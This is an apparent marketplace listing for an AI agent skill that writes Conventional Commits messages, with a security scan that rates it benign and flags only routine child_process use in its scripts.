Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
panda-git-commit
v1.0.2智能生成符合 Conventional Commits 规范的 Git Commit Message。 自动检测 monorepo scope,支持将变更按功能拆分为多个 commit。 触发词:"commit"、"提交"、"生成 commit message"、"拆分提交"、 "split commits"、"...
⭐ 0· 72·0 current·0 all-time
byhash panda@hash-panda
MIT-0
Download zip
LicenseMIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Benign
high confidencePurpose & Capability
Name/description (Conventional Commits / monorepo scope / commit splitting) align with the provided scripts and behavior. The included TypeScript files perform git log/diff analysis, scope detection, convention detection, and commit-message generation — all consistent with the stated purpose. The declared optional runtimes (bun or npx) are reasonable given the .ts scripts target a JS/TS runtime.
Instruction Scope
Runtime instructions tell the agent to run the included scripts and to read git history, diffs, package.json, workspace config files, .git/hooks, and EXTEND.md from project/XDG/home paths — all expected for this tool. The skill will read repository files and may write an EXTEND.md cache to the project path and to user-level config (~/.panda-skills/... or XDG path). This read/write of project and user config is within scope but is noteworthy for users who do not expect local files to be created or updated.
Install Mechanism
No install spec (instruction-only) — scripts are provided and intended to be executed by bun or via npx. There are no downloads from arbitrary URLs or package installs declared in the skill metadata. Execution uses local git and filesystem; no external package fetches are required by the skill itself.
Credentials
The skill requires no secrets or external credentials. It reads standard environment variables (HOME, XDG_CONFIG_HOME) to locate config files and may read/write files under project and user config paths — behavior that is proportional to its caching/configuration purpose. It invokes git via child_process to inspect history and diffs, which is necessary for functionality.
Persistence & Privilege
The skill writes EXTEND.md into .panda-skills in the repository and can write to user-level config paths (XDG or $HOME). It does not request always:true, does not modify other skills, and does not request elevated system privileges. Users should be aware that running --init/--refresh will create or overwrite those local config files.
Assessment
This skill appears to do what it claims: analyze git diffs/history and generate Conventional Commit messages, plus optionally cache project settings to EXTEND.md in the repo or user config. Before installing or running it:
- Review the scripts (they are included) if you want to confirm behavior; they only use git, filesystem, and local exec calls (no network exfiltration).
- Be aware that --init or --refresh will create/overwrite .panda-skills/panda-git-commit/EXTEND.md in your repository or write a file under your XDG config or $HOME. Back up any existing EXTEND.md you care about.
- The skill requires a JS/TS runtime (bun preferred, fallback via npx -y bun) and will invoke git commands; ensure those tools are available and run it in a repo you trust.
- If you only want to inspect results, use --dry-run and/or --with-diff and avoid automatic committing.
If you want higher assurance, run the tool in a sandboxed clone of your repo first and inspect the generated EXTEND.md and console output.scripts/analyzer.ts:29
Shell command execution detected (child_process).
scripts/convention-detector.ts:193
Shell command execution detected (child_process).
scripts/utils.ts:34
Shell command execution detected (child_process).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.Like a lobster shell, security has layers — review code before you run it.
latestvk9730pbxe8q70r5jnredqn5wt183z94c
License
MIT-0
Free to use, modify, and redistribute. No attribution required.
Runtime requirements
Any binbun, npx